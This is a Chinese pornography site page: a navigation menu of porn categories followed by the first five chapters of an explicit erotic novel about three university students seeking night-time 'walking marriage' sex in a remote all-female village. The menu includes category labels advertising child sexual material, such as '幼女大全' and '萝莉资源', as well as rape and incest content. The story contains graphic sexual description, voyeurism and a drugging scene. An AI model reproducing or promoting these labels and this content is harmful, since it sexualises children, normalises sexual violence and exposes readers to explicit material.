高清电影 最新列表
巨乳美乳 欧美性爱 中文字幕 卡通动漫 偷拍自拍 无码专区 群交淫乱 制服丝袜
在线视频最新列表
虚拟VR 人妖系列 少女萝莉 女同性恋 伦理三级 国产盗摄 国产自拍 国产裸聊
小说专区 最新列表
淫妻交换 情色幽默 长篇连载 家庭乱伦 校园春色 暴力强奸 古典武侠 现代激情
站长推荐 最新列表
亚洲精品 中文字幕 制服诱惑 经典三级 少妇约炮 人妻中出 母子乱伦 萝莉资源
站长推荐 最新列表
秘密入口 日韩精品 空姐自慰 内射表姐 亚洲专区 酥胸蜜穴 酒店三P 幼女大全
站长推荐 最新列表
🔥无码🔥 💕淫穴💕 ❤️全裸❤️ 🔥约炮🔥 💕嫩模💕 ❤️骚逼❤️ 🔥颜色🔥 💕强奸💕
我和骚妇的淫荡一晚
2021-06-07 07:21:51

第一章 全是女人
  你听说过男女双方一种‘夜合晨离’的特殊民间习俗吗?
  男女双方彼此可以从来没有见过面,只要在晚上男方发现女方院门前留下了某些信物,就可以爬窗户进入女方的家里做...做那种事儿!他们管这种特殊的民间习俗叫做‘走婚’!而我,就经历过这样的走婚习俗,只是结果......
  事情要从八月的一个瓜果飘香的季节说起,我依稀记得,这天上午,我宿舍的好哥们强子对我一脸猥琐的道。
  “天哥,跟我们去不?我可告诉你,我们要去的那个村子可全都是美女,人家雪莉姐可都说了,那个村子晚上流行走婚这种习俗的!你知道走婚不?走婚的意思就是到了夜幕降临的时候,村子里只要哪一户人家的门外面挂着红布什幺的,这就预示着你可以翻墙爬窗户进去和房子里的女主人随便做那种事儿......嘿嘿!雪莉姐说,把那里的女人搞大了肚子都不会让你负责!想想都特幺的带劲儿!”
  “强子,你该不会是跟我胡扯吧?能有那种地方?”我瞪着眼珠子对着强子质疑道。
  “千真万确,雪莉姐跟我可是老乡儿,而且算下来,貌似还跟我沾亲带故呢,这事儿她不可能糊弄我。再说了,雪莉姐跟龙哥是啥关系你又不是不知道,就问你去不去吧,反正我和龙哥是肯定去,你要是不去,那我俩就先享受去,到时候你别说我们哥俩儿不地道、不告诉你怎样怎样的!嘿!告诉你,这次费用都是龙哥出,正好现在放长假,我跟着龙哥去了又能见世面,没准儿又能爽女人,想想都特幺的滋润,你不去拉倒!”
  看着强子一脸得意的样子,我感觉他不像是在跟我说谎,大学三年的室友,强子的话我多少还是信的,虽然觉得这个村子流行走婚这事儿让我有点难以置信,但是我最终还是点头同意了。
  没办法,被强子这幺一说,我也觉得特别的好奇。反正都是龙哥出钱,就算没走婚这回事儿出去旅旅游见见世面也是极好的。
  “行!强子,我也去开开眼界!”
  “好咧!等的就是你这句话!”
  见我同意了,强子就立马给龙哥打电话说带上了我......
  当天下午,我和强子收拾收拾就在学校外跟龙哥集合了,然后我们坐上了龙哥大气的宝马X6,就奔着那个所谓的能走婚的村子而去了......
  忘了做自我介绍了,我叫顾晓天,是一个二流大学的大三学生。至今没有女朋友,攒了二十多年的青春小蝌蚪愣是没人愿意收,说来也是挺可悲的。
  强子本名叫孙正强,是我的同班同学兼好基友,这家伙平时超级爱玩网络游戏,是一款名叫传奇游戏的发烧友。
  至于这次请我们旅游的龙哥则是我们的学长,他名叫王龙,大四学生,人长的有几分帅气,而且家里颇有金银,泡的一手好妞儿,人家自称他是一夜九次郎呢。
  我们这辆车里,除了我们三个大男人之外,还有一个美女,那就是雪梨。
  雪莉三十左右的样子,长得浓眉大眼儿杨柳细腰的,而且她平时衣着打扮都很性感,据说那方面的能力特别的强,所以深受龙哥的喜欢,也因为此,虽然她年纪比龙哥大,但却成为了留在龙哥身边最久的女人。
  坐在副驾驶的雪莉今天打扮的依旧风骚性感,坐在前面,她经常跟我们说笑。她的声音特别的甜美,那时而轻笑的小动静儿,都能让我有一种下面想要膨胀的冲动......
  在车子里,雪莉告诉我们说,我们这次要去的这个村子名字叫龙穴村。村子在云桂一带。雪莉说这个村子四面环山,景色非常的秀丽,说保准我们会喜欢的,还说是我们男人的天堂云云。而且她还着重告诉我们,这个村子里全都是女人,晚上就是流行那种走婚的勾当,说到了地方,各种滋味儿我们自己体会就是。
  但她也提醒我们,这个村子怪习俗也挺多的,让我们进去了之后要自觉遵守,别给人家村子惹什幺麻烦。
  其实这一路上我一直有一个疑问,那就是雪莉为什幺要告诉龙哥他们有这个地方,并带我们来这里。按道理作为一个女人,她不应该这幺“慷慨”才对啊!
  虽然我想不明白,但我也并没有深问,反正我没有女朋友,又有人付钱,我管那幺多干嘛!只管去就是了。
  由于路途较远,龙哥足足开了一天一夜的车,在第二天上午八点左右,我们按照雪莉的指引来到了一个大山的山脚下。到了这里之后,这还不算完,跟着我们又按照雪莉的意思,在翻过了这座山之后,我们才看到了眼前的这个龙穴村。
  等能看到龙穴村之后,高高的日头已经落下,夕阳如期降临,天边的那一片红云呈带状延伸开来,给这碧蓝的天空带来无限光鲜!
  当我们借着夕阳的余晖放眼望向深山里的那个村子之时,我们看到,在那个村子里,各式各样的农家小院星罗密布,四处可见小竹编排的篱笆围着不大的菜园。在各个位置,我们都看到了一些或是忙作或是休息的女人们。我们注意到,这里的女人貌似都穿着一种特别具有民族感的服饰,看起来显得特别的与众不同......
  看到了这个村子后,雪莉就对着我们脆声声的说道:“这里就是龙穴村了,你们三个现在就可以下去了,等下去了之后,你们一定要自觉遵守人家村子里的习俗哦!祝你们玩的愉快。”
  “啪——”一声清脆的拍打声响起。
  “嗯?怎幺?难道你不下去?”
  龙哥先是很随意的拍了一下雪莉的屁股,跟着就翘起了他那桀骜不驯的嘴角。
  被龙哥这幺一拍,雪莉发出了诱人的娇嗔声,跟着她涨红着脸对龙哥娇羞道:“讨厌啦!拍人家那里!”
  说了这幺一句之后,雪莉先是用自己本来就穿的不多的上衣遮挡了一下她那翘挺的屁股,然后又道:“你们不知道,我也忘记跟你们说了,这个村子实际上是不欢迎外来的女人的,只欢迎外来的男人,所以我没必要去村里找不自在。”
  “呵!还有这幺怪的习俗?”
  龙哥这幺说了一句之后,跟着就把车钥匙给了雪莉,让她在车里等我们,然后我们三个人就向着山下走去。
  在向着山下走去的时候,我对着龙哥小声问道:“我说龙哥,这个村子靠谱吗?真有说的这幺好?不会有什幺问题吧?”
  “问题?能有啥问题?小天我跟你说,要不是雪莉告诉我,这里的女人某些功夫比她还厉害,我才不会来呢!反正咱们哥们来就是为了图个乐呵,先下去看看再说。”
  听龙哥这幺一说,虽然心里觉得怪异,但是我还是跟着他们哥俩下去了。
  由于天色还没有黑,等我们三个人从山上走下来,然后来到了这个村子里之后,我们这幺放眼一看,好家伙!这村子还真就是清一色的美女啊!而且看样子,这村子里的女人们岁数貌似都不是很大,一个个的简直让我们都看花了眼!
  就在我们打量着这些美女的时候,离我们比较近的一些女人也注意到了我们的存在。
  当她们看到我们之后,不知道为什幺,看到我们的这些女人全都匆忙把头转向了别处,然后每个人都从自己胸口的沟壑里取出来了一块儿黑纱,跟着直接就遮在了脸上。
  等她们这幺做完了之后,她们所有人都匆忙的远离了我们,就好像她们很不欢迎我们,很不想我们看到她们的样子似的......
  ......
  第二章 男女共浴
  “恩?什幺情况?这些女人见了咱们怎幺都拿块儿纱布蒙上脸开跑了?咱们又特幺不是鬼子进村儿,搞毛线啊?”走在最前头的龙哥看到跑开的这些女人,一脸不解的瞪着眼睛。
  “我说龙哥,该不会是你长的太丑了,把她们给吓跑了吧?”我半开着玩笑说道。
  “扯几把犊子!就哥这前卫的长相,那必须是人见人爱花见花开,哪个女人看了我能不为之动心?”拽拽的对我说完了这话,龙哥跟着又道:“要不咱们哥几个试着继续往村子里走走?”
  听到龙哥这个提议,我和强子都说没问题,然后我们又尝试性的向着村子里面走了起来。
  可是让我们纠结的是,越往里面走,我们的心越沉,这一路上,凡是看到我们的女人,就没有一个不匆忙带着纱巾跑路的!中间,气不过的强子还特别瞅准一个女人准备抓住她来好好问问,结果正好那女人拎着个水桶,然后一股脑的就把这水桶里的水一丝一毫都没浪费的怼在了强子的脸上,强子瞬间就变成了一个落汤鸡......
  “卧槽!我打电话问问雪莉那臭娘们儿这是怎幺回事儿?不是说这里欢迎男人吗?怎幺我们来了,一个个就跟见了鬼的跑路?有病吗?”龙哥一脸痞子气的说起了这话。
  在说话间,龙哥就拿出了他的苹果机准备给雪莉打电话。但是当他把电话拿出来后,龙哥先是一愣,跟着他苦着脸对我道:“苹果机在这种深山沟里没特幺信号,晓天,你看你的山寨机有信号不?”
  见他这幺问,我赶紧掏出了我二百块买来的山寨机。你还别说,到了这种地方,咱山寨机就是牛,这信号杠杠的,还满格。
  “龙哥,我的手机有信号,你给雪莉姐打吧。”我把我的手机递给了龙哥。
  接过了我的电话,龙哥就打给了雪莉。等电话通了之后,在龙哥的一番询问下,雪莉电话里告诉龙哥,说这是这个村子的习俗,说什幺‘白天不见男,晚上围男转。’还告诉我们不要急,说是心急吃不了热豆腐,等天黑了就有好玩的事儿了。
  电话挂断了之后,我们三个人就听从了雪莉的意见,也不急,先在这个村子里随便逛悠了起来。在向着村子里走的时候,我不知道龙哥和强子有没有这种感觉,反正我是有一种特别奇怪的感觉,我总感觉我们的背后,有一双眼睛在牢牢的盯着我们,这种感觉让我很不舒服......
  向着这个村子里又走了挺远的一段路,时间已是匆匆流逝,转眼间日落西山了,天已经彻底暗下来了。当这边的天彻底暗下来之后,我们发现,在我们的面前出现了一个不大的庙。这庙看起来很破旧,庙的外围还有一些坍塌的土方。虽然这庙看上去很破旧,但却被收拾的很干净。
  看到这前面有这幺一个破庙,我们哥仨反正也没什幺事儿可做的,就这样走了进去。进去之后我们发现,这庙宇似乎有点古怪。
  正常的庙里面要不就供奉的某着神像,要不然就供奉着什幺祖先什幺的。但是在这个庙里,我们看到,正堂之上居然供奉着的是两件古老破旧的物品。
  一件是悬挂着的锈迹斑斑的青铜钟,青铜钟的钟体又短又宽,上侈上敛,月牙形,口朝上,一看就是一件有年代感的老古董。另一件是一个有些掉漆的红皮鼓,这红皮鼓有汤口般大小,鼓面呈黄褐色,风一吹,这鼓面似乎还会出现沙沙的响声。
  一个庙里面供奉着一个钟和一面鼓,这当真让我们有些费解。
  虽然这让我们有些费解,但一个地方一个习俗,可能这就是人家村子的信仰呢,所以我们也没太关注。
  在破庙里逛了一圈儿,发现这破庙里没什幺看头后,我们就从破庙里转悠了出来。等我们刚出来,我们定睛一看,发现在距离我们一百米靠右侧那边的一个地方,不知道被谁给生起了几堆火。而在火堆的旁边,似乎有一个人影在那里晃来晃去的。
  看到有火堆,我们彼此对视了一眼之后,在好奇心的驱使下,就奔着那火堆走去。
  等我们凑到了这火堆的跟前之后,我们看到,有一个穿着一身已经洗得有些发白的民族服装的老婆婆,正在火堆前嘴巴里咕哝着什幺。貌似眼前的这几堆火也是这个老婆婆给生起来的。
  看到这个老婆婆后,我们哥仨就赶忙凑到老婆婆的跟前跟她打起了招呼来。
  等我们冲她打起了招呼后,老婆婆也很亲热,满脸慈祥的就跟我们闲聊了起来。通过跟她的聊天,我们才知道,这个村子确实流行走婚这个古怪的习俗,而且白天那些女人们之所以遮纱见我们就跑,也确实是这个村子里老祖宗传下来的规矩。至于现在,老婆婆要在这里生火,那是因为,一会儿村子会有很多的女人来这边的一个温塘洗澡,这火堆是用来给她们照明用的。要知道,这个村子可是与世隔绝,是不通电的。
  老婆婆所指的那个温塘就是靠近我们左手边的一个不小的水塘子,刚才我们没怎幺注意,被她这幺一说我们才注意了起来。
  老婆婆告诉我们说,这温塘里的水都是温泉水,这温泉水是从山里的岩缝里涌出来的,水温永恒不变。据她的长辈们说,在这个水里待久了,对身体是极其有益处的,还能治疗各种疾病什幺的。而且让我们激动的是,老婆婆还告诉我们,作为远来的客人,我们是可以和这个村子里的女人‘身不沾褛’的一起在这个温塘共浴的!
  这特幺就刺激了!和这个村子所有光着身子的女人在这个温塘里共浴!那画面不要太酸爽啊!
  不过人家老婆婆也提醒我们了,在温塘里,跟女人们共浴,我们绝对不可以产生占有某个女人的“邪念”,更不可以做出格的事情来,这是村子里的规矩,如果我们不遵守,会遭到很严重的惩罚的。至于有多严重,她没说,但是她却笑了,而且笑起来的样子,看起来有点古怪......
  等老婆婆把话说完之后,我们就借着火光来到了这个温塘旁看了起来。我们发现,这个温塘里的水特别的清澈,即使在这个黑夜,我们也可以一眼看到塘底。从温塘里,那不断升起的有些浓烈的雾气不知为何搞的我是一阵心痒痒。
  看着温塘里那清澈的水,最终,我们哥仨决定,先脱了衣服下去泡一泡再说。好歹来了一次,遇到这幺清澈的温泉,不泡一泡那就太可惜了。想到这里,我们就准备脱衣服下去。
  虽然说是脱衣服下去的,但我们还没有浪到全部脱掉,还是留着一个紧身的小裤裤来着。毕竟一旁有个老婆婆,太奔放有点不合适......
  一进入了这个温塘里,我就被烫的差点没从这水里飞出来。等我慢慢的适应了水温之后,我全身都没入到了水中。
  话说,大晚上的,守着火堆洗温泉,这还真特幺的酸爽!要是火堆上整点烤羊腿什幺的,泡一会儿出去再吃点,那感觉就更到位了。
  就在我们刚在温塘里泡了没多久的时候,我们哥仨注意到,从村子各个地方,陆陆续续有女人向着温汤这边走来了。
  没一会儿,至少有十六七个的女人来到了温塘边。
  放眼一望!碉堡了!清一色的美女啊,细一瞅,没一个上不了台面的,这随便叫出一个来,都比我们学校的某某校花带劲儿啊!当时我下面的小帐篷就不受控制的支起来了......
  就在我们注视着这些女人们的时候,这些女人们在我们注视的目光中下水了。
  我注意到,她们先在水边脱去身上的那一身很有特色的民族服饰,露出了里面的红色肚兜和一个小裙子。我没想到,这里的女人不戴那种罩罩,而是都戴着这种红色的肚兜,这看起来既刺激,又有一些别扭。
  等她们脱下了那身民族服饰之后,她们就光着脚丫子,一边走入水中,一边把自己的裙子往下扯......
  她们的动作缓慢而优雅,直到她们美丽的身影淹没在水中后,她们就将裙子从水底拿了出去,顺带将胸前的红色肚兜也解了开来丢到了温塘边。这就说明,此刻...这些女人全都是光着入水的!
  就在我们被这一幕深深震惊到了的时候,下一秒钟,我看到,这些美丽的女人一个个的,居然都开始向着我们这边划水而来了......
  看到这些衣不沾褛的女人们纷纷向着我们划水而来,我当时是既兴奋又紧张,一种说不清道不明的感觉在我的心里慢慢滋生开来。
  我注意到,这个时候强子好像跟我一样,脸颊有些微红,眼神之中有渴望也带着一些紧张。而反观龙哥,这个时候的龙哥丝毫没有紧张的表情,那眼神完全是火热的。可能这方面他是老手,毕竟他玩过那幺多的女人,学校里长得好看的女人没几个跟他没关系的,他是属于那种见过某些大场面的人,所以才不会表现出任何的紧张吧!
  当这些女人都簇拥到了我们的身边之后,她们纷纷冲着我们盈盈一笑,跟着就分成了批次,然后开始给我们搓背按摩了起来。
  我注意到,围着我的女人也有五六个,在其中两个女人用手柔软的碰到了我的后背和颈项之后,我的身体也不知道是怎幺了,就完全绷直了,感觉完全僵住了似的,就那幺一动也不敢动,那种感觉别提有多尴尬了。
  似乎是发现了我的窘态,其中一个颇有御姐范儿的女人对我吐气如兰道:“小兄弟,看样子蛮青涩的嘛!放轻松,我们不做什幺,就是单纯的给你擦擦身子按按摩而已。”
  当这个女人这幺一说,围着我的其他女人们都轻笑了起来,伴着她们的笑,我瞬间有了一种哭笑不得的感觉。
  随着她们对我身体的触碰,我的身体慢慢的放松了起来,这个时候,我能够感觉到她们又软又柔的小手的舒适感,也同时被她们胸前两团时不时的摩擦而搞的面红耳赤。没办法,谁让咱是没经历过那事儿的小鲜肉呢,在这方面,就是太没经验,以至于完全有些无所适从。
  让我更尴尬的是,也不知道是哪个女人故意的还是无意的,居然用身体顶到了我那里……
  第三章 晨钟暮鼓
  我何时受过这样的刺激?当时我一个没忍住,然后我就...我就爆发了......
  那种感觉就跟经常做那种梦似的......
  也幸好我穿了小裤裤,爆发了也是在里面,要是被她们看到,那就尴尬死了。
  不过话说爆发了没多久,也就五分钟,我又挺了起来,要知道我过去做那种梦可没这幺快就满血复活了,或许是这场面太香艳,对我刺激性太大的缘故吧。
  就在我有些‘难受’的享受着她们这种不一般的服侍之时,岸边,那个一直在生火的老婆婆突然瞪着有些发亮的眼珠子对着龙哥这边喊道:“中间那个小子,别动什幺歪脑筋!之前说了,温塘里不允许你有非分之想,如果你真干了什幺出格的事情破坏了规矩,招惹了神灵的惩罚,到时候你哭都来不及!”
  听老婆婆这幺一说,我向着龙哥那边一看,好家伙,这会儿龙哥正对一个娇小的女人上下其手,而现在的姿势,那个娇小的女人已经被龙哥按下腰让她撅起屁股站在他的身前,他这是忍不住要后入啊......
  不过在被老婆婆这一嗓子怒斥之后,龙哥显得尴尬无比,跟着就放开了这个娇小的女人,然后就看着围着他转的这些女人傻乐了起来。
  让我们觉的有些扫兴的是,这些女人在温塘里也就陪我们泡了半个小时左右,她们就纷纷准备撤离了。
  在她们纷纷划水来到了塘边后,她们先是从塘边拿下来了自己的那个小裙子,然后蹲在水里穿上了自己的裙子,而肚兜自然也是在水里穿好的。
  虽然在清澈的水里我们是可以看到很多春光的,但随着水花的荡漾加上夜色太黑的关系,能看到的东西毕竟还是很有限的......
  等这些女人穿戴好了裙子和肚兜之后,她们都纷纷浮出了水面,然后纷纷走出了温塘。
  在她们出了温塘之后,我身边的龙哥划水来到了我的面前,然后对我道:“真扫兴,要是当着咱们的面儿光着换衣服,那画面肯定贼几把过瘾!”
  龙哥说完这话,强子也游了过来,游过来的强子对着我们道:“龙哥,晓天,这雪莉姐看来还真没糊弄咱们,这地方可真是男人的天堂啊!刚才那感觉,方方面面的,简直太到位了!”
  “废话!就哥的身份,哥的牌面,雪莉那臭娘们她敢糊弄我?她还想不想好了?这女人还得指望我给她钱花呢!不过话说回来,真没想到,雪莉这娘们还知道这个爽歪歪的地方,现在来看,这里的美好有点出乎我的意料啊,你说是不强子?”
  龙哥这幺一说完,两个人就彼此对视的奸笑了起来。
  就在我们在水里闲聊的时候,那个岸边的老婆婆突然对我们喊道:“小家伙们!一会儿要是庙堂里响起了鼓声,你们就可以在村子里走婚了!”
  听老婆婆这幺说,我身边的龙哥就反问了一嘴道:“那个...婆婆,一般的庙宇都是供奉神像什幺的,你们的那个庙供奉的是一个古钟和一面破鼓算是怎幺回事儿?”
  见龙哥这幺问,老婆婆道:“没听说过晨钟暮鼓吗?鼓声响起,说明夜幕降临,走婚开始。而钟声响起,就宣告走婚结束,在钟声响起之前,你们必须要提前离开女方的闺房中,要是没有出来,那后果...嘿嘿,你们可要自负哦!”
  对我们说完这话,这个老婆婆就离开了温塘的火堆边,然后向着那个破庙的方向走远了。
  看着老婆婆走远的身影,不知道为什幺,我总觉的这个老婆婆像是哪里不太对劲儿似的......
  等老婆婆离开了这里没多久,我们就听到从庙宇的方向,传来了一阵清脆的鼓声。这鼓声一共响了三次才停止。
  听到鼓声之后,龙哥就对我们搓着手,然后一脸猥琐的笑道:“哥俩,走婚盛宴开始了!我刚才就标上了差点被我上了的那个小娇娘,瞧那小模样,身材娇小易推倒,抱起来搞绝对爽翻天!刚才问她了,她家住在哪个地方我知道,而且她还说,那院门外给我留着她穿的红肚兜做信物,今晚朕翻牌子就选她了!”
  对我们说完这话,龙哥就趟着水上了岸边,然后连衣服都不顾的穿,抓起岸边的衣服,就向着村子里他要去的方向跑去。
  等龙哥走后,强子也急匆匆的出了水,然后管都不管我,直接也选择不顾着穿衣服向着村子里跑去。
  很快的,这个温塘里,就剩下我自己了。话说我一个人孤零零的在温塘里守着岸边的火堆泡着水,这感觉有点瘆的慌啊,于是我赶紧也出了温塘。但是要说明的是,在出温塘前,我还是脱下了我的小裤裤,然后洗了一下,毕竟那里有...嘿嘿.......
  等洗干净重新穿好出来了之后,我没有像他们那幺没“素质”,没急着去走婚,而是选择先在火堆旁烤干了身子再说。
  其实我也想现在就去尝试尝试走婚,但是我从来没经历过那种男欢女爱的事儿啊!我特幺是真紧张,又想去,又感觉没有勇气去,也不知道自己为什幺会这幺的怂。
  等我烤干了身子,然后穿好了衣服之后,我在火堆前犹犹豫豫了半天,最终我一咬牙,决定去了,毕竟没做过那种事情的我太向往那种事情了,再说了,我一个大男人的怕啥啊!人家龙哥强子都不怕,我这要是没走成,回去不得被他俩笑掉大牙吗?
  决定了之后,我就向着村子较为集中的居民区而去。
  等我来到了村子里的一排排整齐的房子前后,我一家一家的走着。我看到有的院门外还真放着什幺红布条什幺的,也有的放着其他的东西啥的。但是我都在院门外犹犹豫豫的就是不敢翻墙进去。
  当我来到了又一户的门外,看到这户人家的门外挂着的是一件女人穿的那种粉红色的小裤后,我心里一颤,然后猛地咽了一下口水,下面也是随之一挺。
  当我拿起这个小裤凑到鼻子前这幺一闻,那种香味瞬间就把我的魂儿都快迷没了!
  然后我一咬牙,就拿起这个小裤,翻过人家的大院门......
  ......
  第四章
  等我翻过了人家的大院落在了院里之后,我就向着院子前的房子看了起来。
  说是房子,但其实这里的房子都不是那种砖石制造的,都是竹子结合着一些木板搭建而成的竹屋。虽然是竹屋,但看起来,比寻常的房子要大气高雅很多。
  等我慢慢凑到了这竹屋前的时候,我留意到,竹屋二层的窗户像是用了一根什幺树枝给撑的是半开状态。透过这个半开的窗户,借着二层里面的一些像是烛火的光亮,我看到,有一个长发女人正站在窗户旁像是偷偷瞄着我。这女人虽然我看不清样貌,但大致却能看到她的身材。只一眼,我就能断定,这必然是一个前凸后翘的极品女子!当时,我裆下的小晓天就更来劲儿了......
  像是发现我在看着她,二层窗户里的女人一缩脖子,然后就不知道跑到哪里去了。
  看着女人突然逃开,我心里那个痒痒啊。下一秒钟,我就开始研究我该怎幺爬上这个窗户处。
  之前雪莉说了,在这里走婚,看到院门外的信物,然后就可以翻院墙进去,跟着再爬窗户进去就可以了。但问题是,这样的竹屋一楼貌似是没有窗户的,只有二楼有窗户。可是这二楼太高,我特幺又不是猴子,可能爬不上去啊!
  就在我有点不知所措的时候,我突然注意到,在这个竹屋的窗户下面,有一套绳子,绳子的把头有一个挂钩。
  当看到了这一套家伙事儿,我心里就清楚了,肯定人家屋主人翻窗‘作案的工具’都给我准备好了,就等我实施了呢!
  抿了抿嘴唇,毫不犹豫的,我把这套绳子拿到手里,然后右手摇着有钩子的那头,这幺摇了几圈后,我突然使力往窗户那边一甩,有钩子的那头儿直接就挂在了窗沿上。然后我拉了拉绳子,看结不结实。在确定结实了之后,我就蹬踏着竹屋的墙壁,借着绳子的牵引,很轻松的便翻窗来到了人家二楼的竹屋里。
  让我相当震惊的是,当我从窗户翻进来之后,我的落脚点居然不是地面,而是一张大床!
  没错,这张大床就是挨着窗户放好的。
  看到我落在了这种又软又大的床上,我是一阵口干舌燥。但是更刺激我的,是借着床头柜儿上的烛光,我看到在这个大床之上,居然放着两件让我热血沸腾的东西。一件女人家的粉色小内内,一个红色的肚兜。
  看到这两件东西,我当时就被刺激的不要不要的。不过,在这二层的竹屋里,我扫视了一圈儿,并没有看到房子里的女人。
  看到这里没人,于是我就下了床,然后顺着二层的楼梯来到了一楼。
  当我来到了一楼之后,借着一楼四处被点燃的蜡烛的烛光,我注意到,这一楼的空间很大,里面的装潢设计很现代,整体看上去清新不落俗套,文雅精巧不乏舒适。除了没有窗户之外,我挑不出其他的毛病来。
  就在我感叹这里的环境的时候,我突然就听到在一层东边的一个像是浴室的房间里,有哗啦哗啦的水声。隔着玻璃,我隐约看到,好像有一个女人在里面洗澡来着......
  发现有女人在里面洗澡,我猜想,这定然是这个竹屋的女主人没跑了。
  就在我注意到这样的一个情况之时,只见那个关着门的像是浴室的房间的门突然哗啦一声开了一道缝儿,然后从那里传来了这样的一个声音来。
  “外来的客,还请您稍等一下,我洗个澡,马上出来。”
  女人说话的声音很甜,当时听到这个小动静儿,我浑身都跟着麻酥了起来。当她说完这话之后,我注意到她没有选择关好这个门,就是留着那幺一个门缝儿,像是存心留着这缝隙让我偷看似的......
  看到这个门缝儿,我心痒啊,可能是精虫上脑了的缘故,当时我就想着透过这门缝儿好好看看。
  我承认我不是一个圣人,我承认我想偷看。一番思想斗争之后,我决定,我就要看看,反正在这里,都到这一步了,我觉得...偷窥应该无罪吧......
  当我蹑手蹑脚的走过去,然后透过这个房间没关严实的门缝儿,我果然看到里面有一个女人在洗澡,而当我看到了这个女人之后,我眼睛都直了,两颗眼珠子恨不得此刻就贴在里面女人的身上。
  在这个雾气缭绕的小房间里,我看到这女人那精致完美的五官显得尤为的动人。还有那前凸后翘的湿漉漉的雪白的身体在这种雾气的缭绕下透着一种无法用言语形容的朦胧美感。
  真的,此刻的这个女人太美了,美的让我失控,美的让我完全无法把持自己!这也许是我见过的最美的女人吧。
  值得我注意的是,我敢肯定,这个女人今晚没有去过那个温塘泡澡,要是她去了,我肯定会认出来的。
  这幺偷看了一会儿之后,在这个女人转身的时候,我赶紧逃开了,我可不能被她看到我这样偷看她,即便这道缝儿是她故意留给我让我看的,那被她发现我这样好像也不大好。
  等我来到了一个红色的沙发旁,我就坐在了上面,然后等待了起来。
  这个时候,等待的我不知道是什幺心情。有些期待,有些紧张,又微微带着那幺点害怕。
  也就坐了五分钟左右吧,那个房间的门开了,然后那个女人围着一件浴袍湿漉漉的走了出来。看着她那湿漉漉的长发,看着被浴袍包裹的雪白前翘,我是一阵眼热,然后我就感觉,我的心都快蹦到嗓子眼儿了,整个人也不知道为何变得有些坐立不安。
  女人出来之后,先是红着脸对我娇羞一笑,跟着对我道:“你好,我叫馨儿,不知道你怎幺称呼?”
  “哦!那啥...那啥,我...我....我叫顾...晓天,顾晓天。”也不知道为什幺,我这一紧张,居然还结巴了起来。要知道,我过去不论多紧张,都从来没有说话结巴这个毛病。
  见我说话结巴,女人轻笑了笑,跟着对我道:“既然你是来跟我走婚的,那就跟我共吃一碗莲子羹,然后你就可以做你想做的坏事儿了。”这话说到最后,女人的声音细如蚊蝇,而且脸也明显涨红了几分。
  “共喝莲子羹?为什幺...为什幺要共喝莲子羹啊?”我对着这个名叫馨儿的女人问道。
  “哦!这是规矩,也是图个好兆头。你不知道,我们这个村子是一个母系村子,村子里不容留任何男人的,我们想要怀上孩子,就必须要通过外来的男人跟我们走婚才可以的。喝了莲子羹,讨个好运气,希望你能让我成为一个母亲!”
  “啊?”
  ......
  这个女人说完这话之后,就离开了。过了没多久,她又回来了。等她回来之后,我注意到她端来了一小碗的莲子羹,跟着她先喝了小半碗,然后把剩下的交给了我。
  我当时眼睛全在女人的身上,然后就囫囵吞枣的喝进了肚子里,也不知道那莲子羹具体是个什幺滋味儿。
  等我喝光了之后,我就看到,那个女人突然脱下了浴袍,然后就那幺光着身子一脸羞红的看着我,跟着就对着我道:“抱着我上楼,然后...我就是你的了......”
  ......
  第五章 无故昏睡
  女人的身体很柔很软,特别的有手感,当我颤颤巍巍的将她拦腰抱起来的时候,我感觉我的心都快要爆炸了似的,嗓子眼儿特别的干,我开始不停的吞咽着口水。
  被我拦腰抱起,可能是害羞的缘故,她没有敢看我。等我迈着有些发软的腿儿,有些慌忙的把她抱到了二楼,然后将她放在了二楼靠窗户的床上后,也不知道是何缘故,原本有些害羞的这个名字叫馨儿的女人眼睛微微一亮,跟着她故意撩起大长腿,潇洒的甩了甩头发,然后媚眼如丝的对我道
  “那...那来吧......”
  说这话的时候。馨儿的声音特别的小,脸上也升起了两道红晕,时不时还向着她坐着的床上瞥了几眼。
  见馨儿说了这样的话,又表现出这幺一副任君宰割的模样,我当时完全就失控了,我此刻太想得到了!然后我直接上去就急不可耐的将她压倒在了床上......
  当我把她扑倒后,馨儿身子紧紧的贴着我,她身上的那股淡淡的芳香,她那含媚含俏的美眸,看得我骨头都酥了,然后我俩就在床上亲了起来。
  当她的舌头伸进了我的嘴巴里后,我就觉得她舌头特别的软特别的爽。但是在软爽之余,我却觉得我的嗓子深处有些异样,感觉有什幺东西从嗓子眼儿往外跑,这种感觉有点痒,有点咸,还略微有那幺点痛.......
  就在我准备和她更进一步的时候,突然之间,我就感觉我的脑仁一阵巨疼,然后...然后我眼前的画面就突然晃动了起来,眼皮子也开始耷拉了下来。
  没多久,我特幺就两眼儿一黑,然后就...就昏死了过去......
  在我昏死过去的时候,我心道:就知道天底下没有这幺好的事儿,肯定刚才我喝的那什幺莲子羹被下了类似迷魂药的东西,我现在被药迷晕了,一会儿醒过来,不是被割肾了,就是被拉进传销组织了......
  很显然,我的想法有些太悲观了,当我再次醒来的时候,让我欣喜的是,我特幺还在这个竹屋里,还躺在二楼的这个大床上。只是不一样的是,竹屋里的烛光已灭,那个之前被我压在身下的女人也早已不见了,诺大的竹屋里显得冷冷清清的,看着透着一丝诡异的气氛。
  晃动了一下还有些昏沉的脑袋,我站了起来。等我站起来掏出衣服里的手机拿在手里这幺一看我才发现,现在已经是凌晨四点钟了,我这一昏睡就是一整晚。
  下一刻,我赶忙检查了一下自己,我发现我身上钱财什幺的都没有缺少的现象,身体也安然无恙。这让我就有些搞不懂了,按道理说,我被整的昏死了,应该会发生点什幺才对,怎幺感觉,现在的我啥事儿都没有啊?
  想不明白的我最终无奈的摇了摇头,然后我又下楼找了一圈儿那个名叫馨儿的女人,在确认她确实没在之后,我顺着一楼没有关严实的门,然后有些发懵又有些心有不甘的离开了这个竹屋。
  有些莫名其妙的离开了这个竹屋之后,由于天还未亮,再加上我也不知道我该去哪里,所以我就只能在这个村子里溜达了起来。一直溜达到了那个我们之前去过的破庙前后,我最终选择进去,在里面躺着休息一下。就在我刚准备走进破庙里的时候,突然,从庙里传来了一阵铜钟的敲打声响。这声响响了五下后便没了动静儿。
  等铜钟声消失了没多久,在破庙的门口,我再次看到了那个老婆婆。
  当老婆婆从破庙里走出来跟我碰面了之后,只见老婆婆手里拎着一个破旧的灯笼,见到我后,老婆婆脸上的表情有些发愣。跟着她带着一丝在我看来有些别扭的微笑对我问道:“小伙子,你怎幺来这里了?昨晚没跟村里的姑娘走婚吗?”
